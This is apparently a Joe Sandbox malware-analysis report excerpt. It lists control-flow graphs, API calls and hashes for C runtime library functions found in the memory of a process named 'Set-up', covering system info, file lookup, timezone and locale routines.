                                                                                              • Instruction Fuzzy Hash: 7CE1587190CAE29FD7129F358CA4AA57F68AFA3384B0904DECA404B1D3E668D946C752
                                                                                              Function 6BB9BE38 Relevance: 61.6, APIs: 31, Strings: 4, Instructions: 336libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 778 6bb9be38-6bb9be9e GetSystemInfo call 6bb52680 GetVersionExW 781 6bb9bebe-6bb9bec7 778->781 782 6bb9bea0-6bb9beb4 call 6bb980ca 778->782 784 6bb9becd-6bb9bece 781->784 785 6bb9bfa7-6bb9bfad 781->785 791 6bb9beb8-6bb9beb9 call 6bb777d4 782->791 787 6bb9bf60-6bb9bf64 784->787 788 6bb9bed4-6bb9bed9 784->788 789 6bb9bfb3-6bb9bfb7 785->789 790 6bb9c2d7-6bb9c2eb call 6bb980ca 785->790 792 6bb9bf9b-6bb9bfa5 787->792 793 6bb9bf66-6bb9bf6d 787->793 794 6bb9bedb-6bb9beec 788->794 795 6bb9bf43-6bb9bf5b call 6bb980ca 788->795 796 6bb9bfb9-6bb9bfba 789->796 797 6bb9bffe 789->797 791->781 804 6bb9c023-6bb9c03e GetModuleHandleW GetProcAddress 792->804 802 6bb9bf8c-6bb9bf96 793->802 803 6bb9bf6f-6bb9bf87 793->803 805 6bb9beee 794->805 806 6bb9bef4-6bb9bf11 GetModuleHandleW GetProcAddress 794->806 795->791 801 6bb9c004-6bb9c00b 796->801 807 6bb9bfbc 796->807 797->801 810 6bb9c00d-6bb9c010 801->810 811 6bb9bfc6-6bb9bfd6 801->811 802->806 803->806 812 6bb9c06c-6bb9c080 GetLastError 804->812 813 6bb9c040-6bb9c048 GetLastError 804->813 805->806 814 6bb9c18f-6bb9c1a9 GetLastError 806->814 815 6bb9bf17-6bb9bf1f GetLastError 806->815 807->811 810->811 816 6bb9c012-6bb9c015 810->816 821 6bb9bfdb-6bb9bfe2 811->821 830 6bb9c0aa-6bb9c0bd call 6bb60233 812->830 831 6bb9c082-6bb9c086 GetLastError 812->831 817 6bb9c04a-6bb9c04f 813->817 818 6bb9c054-6bb9c067 call 6bb98080 813->818 832 6bb9c1ab-6bb9c1af GetLastError 814->832 833 6bb9c1d0-6bb9c1e3 call 6bb60233 814->833 819 6bb9bf2b-6bb9bf3e call 6bb98080 815->819 820 6bb9bf21-6bb9bf26 815->820 816->806 823 6bb9c01b-6bb9c01d 816->823 817->818 818->791 819->791 820->819 826 6bb9bfe9-6bb9bffd call 6bb607a7 821->826 827 6bb9bfe4 call 6bbaa3dd 821->827 823->804 823->806 827->826 850 6bb9c0ed-6bb9c0f3 830->850 851 6bb9c0bf-6bb9c0e8 call 6bb6b079 830->851 838 6bb9c088-6bb9c08d 831->838 839 6bb9c092-6bb9c0a5 call 6bb98080 831->839 840 6bb9c1b8-6bb9c1c7 call 6bb98080 832->840 841 6bb9c1b1-6bb9c1b3 832->841 852 6bb9c213-6bb9c21c 833->852 853 6bb9c1e5-6bb9c20a call 6bb6b079 833->853 838->839 839->791 840->833 841->840 862 6bb9c11d-6bb9c141 850->862 863 6bb9c0f5-6bb9c0f9 GetLastError 850->863 851->791 860 6bb9c21e-6bb9c222 GetLastError 852->860 861 6bb9c243-6bb9c26b 852->861 853->852 864 6bb9c22b-6bb9c23a call 6bb98080 860->864 865 6bb9c224-6bb9c226 860->865 868 6bb9c26d-6bb9c272 861->868 869 6bb9c2b4-6bb9c2b8 861->869 866 6bb9c16d-6bb9c171 862->866 867 6bb9c143-6bb9c14e 862->867 870 6bb9c0fb-6bb9c100 863->870 871 6bb9c105-6bb9c118 call 6bb98080 863->871 864->861 865->864 866->821 879 6bb9c177-6bb9c18a call 6bb6014e 866->879 876 6bb9c14f-6bb9c154 867->876 877 6bb9c27a-6bb9c27d 868->877 878 6bb9c274 868->878 873 6bb9c2ba-6bb9c2c7 call 6bb6014e 869->873 874 6bb9c2cd-6bb9c2d2 call 6bb9bd35 869->874 870->871 871->791 873->874 874->821 883 6bb9c15c-6bb9c15f 876->883 884 6bb9c156 876->884 886 6bb9c27f 877->886 887 6bb9c285-6bb9c287 877->887 878->877 879->821 890 6bb9c161 883->890 891 6bb9c167-6bb9c16b 883->891 884->883 886->887 893 6bb9c289-6bb9c290 887->893 894 6bb9c2a5-6bb9c2b2 887->894 890->891 891->866 891->876 896 6bb9c29c-6bb9c29f 893->896 897 6bb9c292-6bb9c298 893->897 894->868 894->869 896->894 897->897 898 6bb9c29a 897->898 898->896
                                                                                              APIs
                                                                                              • GetSystemInfo.KERNEL32(?,00000000,00000000,00000000), ref: 6BB9BE5C
                                                                                              • _memset.LIBCMT(?,00000000,00000114), ref: 6BB9BE85
                                                                                              • GetVersionExW.KERNEL32(?), ref: 6BB9BE96
                                                                                              • GetLastError.KERNEL32 ref: 6BB9C07B
                                                                                              • GetLastError.KERNEL32 ref: 6BB9C082
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9C097
                                                                                              • malloc.MSVCR100 ref: 6BB9C0B0
                                                                                              • std::exception::exception.LIBCMT ref: 6BB9C0D2
                                                                                              • GetLastError.KERNEL32 ref: 6BB9C0F5
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9C10A
                                                                                              • free.MSVCR100(?), ref: 6BB9C178
                                                                                              • GetLastError.KERNEL32 ref: 6BB9C1A4
                                                                                              • GetLastError.KERNEL32 ref: 6BB9C1AB
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9C1BD
                                                                                              • malloc.MSVCR100 ref: 6BB9C1D6
                                                                                              • std::exception::exception.LIBCMT ref: 6BB9C1F8
                                                                                              • GetLastError.KERNEL32 ref: 6BB9C21E
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9C230
                                                                                              • free.MSVCR100(?), ref: 6BB9C2BB
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB9BEAA
                                                                                                • Part of subcall function 6BB980CA: std::exception::exception.LIBCMT(6BB9C2E6,00000114,?), ref: 6BB980DE
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BB9BEB9
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformationEx), ref: 6BB9BEFE
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BB9BF05
                                                                                              • GetLastError.KERNEL32 ref: 6BB9BF17
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9BF30
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB9BF4D
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation,?,6BBFFEB4,00000000), ref: 6BB9C02D
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BB9C034
                                                                                              • GetLastError.KERNEL32 ref: 6BB9C040
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9C059
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB9C2E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error$Concurrency::unsupported_os::unsupported_osstd::exception::exception$AddressHandleModuleProcfreemalloc$ExceptionInfoSystemThrowVersion_memset
                                                                                              • String ID: GetLogicalProcessorInformation$GetLogicalProcessorInformationEx$bad allocation$kernel32.dll
                                                                                              • API String ID: 1988720266-1310109495
                                                                                              • Opcode ID: 1f16ea724d838683d112c2e9af6de37977242ff13d071de2b9e595929cb6aded
                                                                                              • Instruction ID: 64f03b279837099059cbf18caad96cab1bf2ab195c57c6f041f11bb1a5368312
                                                                                              • Opcode Fuzzy Hash: 1f16ea724d838683d112c2e9af6de37977242ff13d071de2b9e595929cb6aded
                                                                                              • Instruction Fuzzy Hash: A2C1CF716086C19FD714EF69E881A5A77F8EB8B750F11487EE044D2140D73ECB49EBA2
                                                                                              Function 6BB781A1 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 316COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 899 6bb781a1-6bb781cf 900 6bb781d5-6bb781d7 899->900 901 6bb87cb4-6bb87ccb call 6bb6aafe call 6bb607b5 call 6bbdaeae 899->901 900->901 903 6bb781dd-6bb781ec call 6bb60a0e 900->903 912 6bb87cd0-6bb87cd6 901->912 909 6bb781f2-6bb781f7 903->909 910 6bb7828b-6bb7829a call 6bb607b5 call 6bb6aafe 903->910 909->912 913 6bb781fd-6bb78223 call 6bb780bc FindFirstFileExW 909->913 929 6bb7829c 910->929 917 6bb87cd8-6bb87cdc 912->917 918 6bb87ce2-6bb87cec towlower 912->918 922 6bb87d7d-6bb87d87 913->922 923 6bb78229-6bb7823e call 6bb60a0e 913->923 917->910 917->918 925 6bb87cf4-6bb87cfe GetDriveTypeW 918->925 926 6bb87de8-6bb87dee 922->926 927 6bb87d89-6bb87d93 922->927 923->910 946 6bb78240-6bb78260 call 6bb78163 923->946 930 6bb7827f-6bb78285 925->930 931 6bb87d04-6bb87d0a 925->931 932 6bb87e00-6bb87e16 FileTimeToLocalFileTime 926->932 933 6bb87df0-6bb87df6 926->933 927->926 935 6bb87d95-6bb87db2 call 6bb6c2fc 927->935 937 6bb7829f-6bb782ad call 6bb607a7 929->937 930->910 934 6bb87d6c-6bb87d78 call 6bb6014e 930->934 938 6bb87d18-6bb87d67 call 6bbba131 931->938 939 6bb87d0c-6bb87d17 call 6bb6014e 931->939 942 6bb88009-6bb88022 GetLastError call 6bb6ab0f FindClose 932->942 943 6bb87e1c-6bb87e32 FileTimeToSystemTime 932->943 933->932 940 6bb87df8-6bb87dfe 933->940 934->910 935->910 962 6bb87db8-6bb87dbf 935->962 958 6bb87fb0-6bb87fd8 call 6bbb0799 938->958 939->938 949 6bb87e78-6bb87e7e 940->949 942->929 943->942 951 6bb87e38-6bb87e75 call 6bbba131 943->951 946->930 970 6bb78262-6bb7826c call 6bb628e5 946->970 960 6bb87e80-6bb87e86 949->960 961 6bb87e96-6bb87eac FileTimeToLocalFileTime 949->961 951->949 979 6bb87fda-6bb87fe1 958->979 980 6bb87fe4-6bb88004 958->980 960->961 967 6bb87e88-6bb87e94 960->967 961->942 968 6bb87eb2-6bb87ec8 FileTimeToSystemTime 961->968 962->910 969 6bb87dc5-6bb87de3 call 6bbd7cfc _close 962->969 973 6bb87f0e-6bb87f14 967->973 968->942 974 6bb87ece-6bb87f0b call 6bbba131 968->974 969->937 970->925 984 6bb78272-6bb78279 call 6bb7813d 970->984 976 6bb87f2c-6bb87f42 FileTimeToLocalFileTime 973->976 977 6bb87f16-6bb87f1c 973->977 974->973 976->942 985 6bb87f48-6bb87f5e FileTimeToSystemTime 976->985 977->976 983 6bb87f1e-6bb87f2a 977->983 979->980 980->937 987 6bb87fa4-6bb87faa FindClose 983->987 984->925 984->930 985->942 989 6bb87f64-6bb87fa1 call 6bbba131 985->989 987->958 989->987
                                                                                              APIs
                                                                                              • _wcspbrk.LIBCMT(?,6BB77D1C), ref: 6BB781E3
                                                                                              • _getdrive.MSVCR100 ref: 6BB781FD
                                                                                                • Part of subcall function 6BB780BC: GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,?), ref: 6BB780EF
                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 6BB78214
                                                                                              • _wcspbrk.LIBCMT(?,./\), ref: 6BB78235
                                                                                                • Part of subcall function 6BB78163: _errno.MSVCR100 ref: 6BB7816A
                                                                                                • Part of subcall function 6BB78163: _errno.MSVCR100 ref: 6BB78171
                                                                                                • Part of subcall function 6BB78163: _wfullpath.MSVCR100(?,?,?), ref: 6BB78182
                                                                                                • Part of subcall function 6BB78163: _errno.MSVCR100 ref: 6BB7818C
                                                                                              • _wcslen.LIBCMT(00000000), ref: 6BB78263
                                                                                              • _errno.MSVCR100 ref: 6BB7828B
                                                                                              • __doserrno.MSVCR100 ref: 6BB78295
                                                                                              • __doserrno.MSVCR100 ref: 6BB87CB4
                                                                                              • _errno.MSVCR100 ref: 6BB87CBB
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB87CC6
                                                                                              • towlower.MSVCR100(00000000), ref: 6BB87CE3
                                                                                              • GetDriveTypeW.KERNEL32(00000000), ref: 6BB87CF5
                                                                                              • free.MSVCR100(?), ref: 6BB87D12
                                                                                              • ___loctotime64_t.LIBCMT ref: 6BB87D45
                                                                                              • free.MSVCR100(?), ref: 6BB87D72
                                                                                                • Part of subcall function 6BB7813D: _wcslen.LIBCMT(00000000,6BB78277), ref: 6BB78140
                                                                                              • __wsopen_s.LIBCMT(000000FF,?,00000000,00000040,00000000), ref: 6BB87DA8
                                                                                              • __fstat64i32.LIBCMT(000000FF,?), ref: 6BB87DCC
                                                                                              • _close.MSVCR100(000000FF,000000FF,?), ref: 6BB87DD9
                                                                                              • FindClose.KERNEL32(?), ref: 6BB87FAA
                                                                                              • ___wdtoxmode.LIBCMT ref: 6BB87FB7
                                                                                              • GetLastError.KERNEL32 ref: 6BB88009
                                                                                              • __dosmaperr.LIBCMT(00000000), ref: 6BB88010
                                                                                              • FindClose.KERNEL32(?), ref: 6BB8801C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$Find$Close__doserrno_wcslen_wcspbrkfree$CurrentDirectoryDriveErrorFileFirstLastType___loctotime64_t___wdtoxmode__dosmaperr__fstat64i32__wsopen_s_close_getdrive_invalid_parameter_noinfo_wfullpathtowlower
                                                                                              • String ID: ./\
                                                                                              • API String ID: 2703246364-3176372042
                                                                                              • Opcode ID: 86c617146b37c7425ffa69d38de53ba604f1c838b00cb3a628c9824009101d23
                                                                                              • Instruction ID: 132b4d04f55bfac546b7a5c9274a811957013071c4a06bf99c8dee5dca80e061
                                                                                              • Opcode Fuzzy Hash: 86c617146b37c7425ffa69d38de53ba604f1c838b00cb3a628c9824009101d23
                                                                                              • Instruction Fuzzy Hash: 1DC154B19045A9EEDB609F76CC44AA9B7B8FF09315F0401EAE65CE3140E7789E80CF65
                                                                                              Function 6BB762FC Relevance: 40.8, APIs: 27, Instructions: 271stringtimeCOMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1748 6bb762fc-6bb7633b call 6bb60c80 call 6bb60c43 call 6bb75c2e call 6bb75c34 1757 6bb76341-6bb7634d call 6bb75c50 1748->1757 1758 6bb89a24-6bb89a29 call 6bbdae5c 1748->1758 1757->1758 1764 6bb76353-6bb7635f call 6bb76614 1757->1764 1762 6bb89a2e-6bb89a3b call 6bb6014e 1758->1762 1764->1758 1768 6bb76365-6bb76394 call 6bb6a3de call 6bb72214 1764->1768 1773 6bb7639a-6bb763a1 1768->1773 1774 6bb899b6-6bb899b8 1768->1774 1773->1762 1775 6bb763a7-6bb763b4 GetTimeZoneInformation 1773->1775 1774->1773 1776 6bb899be-6bb899c5 1774->1776 1777 6bb763ba-6bb763d5 1775->1777 1778 6bb76479 1775->1778 1779 6bb899e8-6bb899fe call 6bb528e0 call 6bb60cd9 1776->1779 1780 6bb899c7-6bb899d2 call 6bb52800 1776->1780 1781 6bb763d7-6bb763e2 1777->1781 1782 6bb763e5-6bb763ec 1777->1782 1785 6bb76480-6bb764ad call 6bb75c6c call 6bb75c72 call 6bb75c78 call 6bb762cf 1778->1785 1779->1778 1803 6bb89a04-6bb89a1e call 6bb528e0 call 6bb62c05 1779->1803 1780->1778 1795 6bb899d8-6bb899df 1780->1795 1781->1782 1786 6bb763f2-6bb763f9 1782->1786 1787 6bb762d8-6bb762de 1782->1787 1818 6bb764b3-6bb764b8 call 6bb60cc5 1785->1818 1819 6bb89a40-6bb89a54 call 6bb69385 1785->1819 1786->1787 1792 6bb763ff-6bb7640b 1786->1792 1794 6bb7640e-6bb7642e WideCharToMultiByte 1787->1794 1792->1794 1799 6bb76434-6bb76437 1794->1799 1800 6bb762e3-6bb762ea 1794->1800 1795->1779 1796 6bb899e1-6bb899e7 call 6bb6014e 1795->1796 1796->1779 1799->1800 1804 6bb7643d-6bb76442 1799->1804 1805 6bb76445-6bb76461 WideCharToMultiByte 1800->1805 1803->1758 1803->1785 1804->1805 1809 6bb76467-6bb7646a 1805->1809 1810 6bb762ef-6bb762f7 1805->1810 1809->1810 1813 6bb76470-6bb76476 1809->1813 1810->1778 1813->1778 1819->1758 1824 6bb89a56-6bb89a5c 1819->1824 1825 6bb89a5e-6bb89a65 1824->1825 1826 6bb89a66-6bb89a73 call 6bb6fc9d 1824->1826 1825->1826 1829 6bb89a76-6bb89a7a 1826->1829 1830 6bb89a7c-6bb89a7e 1829->1830 1831 6bb89a84-6bb89a85 1829->1831 1832 6bb89a80-6bb89a82 1830->1832 1833 6bb89a91-6bb89a94 1830->1833 1831->1829 1832->1831 1832->1833 1834 6bb89ace-6bb89ad1 1833->1834 1835 6bb89a96-6bb89aa4 call 6bb6fc9d 1833->1835 1837 6bb89ad3 1834->1837 1838 6bb89ad6-6bb89ade 1834->1838 1843 6bb89aab-6bb89aaf 1835->1843 1837->1838 1840 6bb89afa-6bb89afd 1838->1840 1841 6bb89ae0-6bb89af2 call 6bb69385 1838->1841 1844 6bb89aff-6bb89b11 call 6bb75c6c call 6bb75c72 1840->1844 1841->1758 1849 6bb89af8 1841->1849 1846 6bb89ab1-6bb89ab4 1843->1846 1847 6bb89aa6-6bb89aa8 1843->1847 1846->1834 1851 6bb89ab6-6bb89ac1 call 6bb6fc9d 1846->1851 1847->1846 1850 6bb89aaa 1847->1850 1849->1844 1850->1843 1857 6bb89ac8-6bb89acc 1851->1857 1857->1834 1858 6bb89ac3-6bb89ac5 1857->1858 1858->1834 1859 6bb89ac7 1858->1859 1859->1857
                                                                                              APIs
                                                                                              • _lock.MSVCR100(00000007,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB7631E
                                                                                                • Part of subcall function 6BB60C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60C5E
                                                                                              • __tzname.MSVCR100(6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB76327
                                                                                              • _get_timezone.MSVCR100(?,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB76333
                                                                                              • _get_daylight.MSVCR100(6BB7693D,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB76345
                                                                                              • _get_dstbias.MSVCR100(00000008,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB76357
                                                                                              • ___lc_codepage_func.MSVCR100(6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB76365
                                                                                                • Part of subcall function 6BB72214: _strlen.LIBCMT(00000000), ref: 6BB72232
                                                                                                • Part of subcall function 6BB72214: _strlen.LIBCMT(00000000), ref: 6BB72241
                                                                                                • Part of subcall function 6BB72214: __fassign.LIBCMT(00000000,00000000,00000000), ref: 6BB7225D
                                                                                              • GetTimeZoneInformation.KERNEL32(6BC04DF0,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB763AC
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,6BC04DF4,00000000,?,0000003F,00000000,?), ref: 6BB7642A
                                                                                              • WideCharToMultiByte.KERNEL32(000000FF,00000000,6BC04E48,000000FF,?,0000003F,00000000,?), ref: 6BB7645D
                                                                                              • __timezone.MSVCR100 ref: 6BB76483
                                                                                              • __daylight.MSVCR100 ref: 6BB7648D
                                                                                              • __dstbias.MSVCR100 ref: 6BB76497
                                                                                              • strcmp.MSVCR100(00000000,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB899C9
                                                                                              • free.MSVCR100(00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB899E2
                                                                                              • _strlen.LIBCMT(00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB899E9
                                                                                              • _malloc_crt.MSVCR100(00000001,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB899F0
                                                                                              • _strlen.LIBCMT(00000000,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB89A06
                                                                                              • strcpy_s.MSVCR100(00000001,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB89A14
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB89A29
                                                                                              • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,6BB764C0,0000002C,6BB7650A,6BB76528,00000008,6BB7693D), ref: 6BB89A2F
                                                                                              • strncpy_s.MSVCR100(?,00000040,00000000,00000003), ref: 6BB89A4A
                                                                                              • atol.MSVCR100(-00000003), ref: 6BB89A67
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strlen$ByteCharMultiWidefree$CriticalEnterInformationSectionTimeZone___lc_codepage_func__daylight__dstbias__fassign__invoke_watson__timezone__tzname_get_daylight_get_dstbias_get_timezone_lock_malloc_crtatolstrcmpstrcpy_sstrncpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 3174396702-0
                                                                                              • Opcode ID: ffd60283073ba18985affda409542d88f88e6d1c28ae89f98a9a033e555c3e44
                                                                                              • Instruction ID: ec4b9a8d4998f608dddc025c1be430874f5ebbea288f22d6ac27984bcc41f6b8
                                                                                              • Opcode Fuzzy Hash: ffd60283073ba18985affda409542d88f88e6d1c28ae89f98a9a033e555c3e44
                                                                                              • Instruction Fuzzy Hash: DD91E271C042859FDF10AFB9C88199DBBF9FF1A314B60107AE1A1A7291E77D8E41CB64
                                                                                              Function 6BB6767A Relevance: 18.2, APIs: 12, Instructions: 160stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000002,?,?,00000000), ref: 6BB67435
                                                                                              • free.MSVCR100(?,?,?,00000000), ref: 6BB67456
                                                                                              • _calloc_crt.MSVCR100(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BB6763F
                                                                                              • strncpy_s.MSVCR100(00000000,00000000,00000000,-00000001), ref: 6BB67659
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676C4
                                                                                              • _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6BB676D3
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6BB676EC
                                                                                              • free.MSVCR100(00000000), ref: 6BB906E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale$_calloc_crtfree$strncpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 2432546303-0
                                                                                              • Opcode ID: d73a824604444f0e50cf2fd3e6150e7193ba609834f23d19682ce6e19fb32f10
                                                                                              • Instruction ID: 8d8cfa0ce0a977ebbcc559ff85802e010ce632a13a9b61a6fdf5007213c577a5
                                                                                              • Opcode Fuzzy Hash: d73a824604444f0e50cf2fd3e6150e7193ba609834f23d19682ce6e19fb32f10
                                                                                              • Instruction Fuzzy Hash: 6E51BE7290029AABEB109F668C45BAF3BB8EF05794F1044A5FD1892140FBB9CD64DF61
                                                                                              Function 6BB673B4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,00000005,00000002,?,?,6BB672F5,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB673D5
                                                                                              • strcmp.MSVCR100(00000000,ACP,?,?,6BB672F5,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB72C1C
                                                                                              • strcmp.MSVCR100(00000000,OCP,?,?,6BB672F5,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB9176C
                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,00000005,00000002,?,?,6BB672F5,?,6BB65B65,?,000000BC,?,00000000,00000000,00000005), ref: 6BB91785
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocalestrcmp
                                                                                              • String ID: ACP$OCP
                                                                                              • API String ID: 3191669094-711371036
                                                                                              • Opcode ID: fb58696909692a68e7f77115e9461d10838ea30d38830ccfee59f10ed6ddb875
                                                                                              • Instruction ID: 2750b75f933e87a5bdb614aeb74a859c3281ec0dce693f1bf8a3b52bc6ac9164
                                                                                              • Opcode Fuzzy Hash: fb58696909692a68e7f77115e9461d10838ea30d38830ccfee59f10ed6ddb875
                                                                                              • Instruction Fuzzy Hash: 91012871A0569BBAEB119E75A845F9E33ACEF03398F2400B5EA01E1080FB6DCA419656
                                                                                              Function 6BB6A2A7 Relevance: 12.2, APIs: 8, Instructions: 225COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcsncpy_s.MSVCR100(?,000000FF,?,00000000,?,?,?,?,?,6BB6A24E,?,?,?,?,?,?), ref: 6BB6A3A2
                                                                                              • wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6BB6A24E,?,?,?,?,?,?), ref: 6BB91272
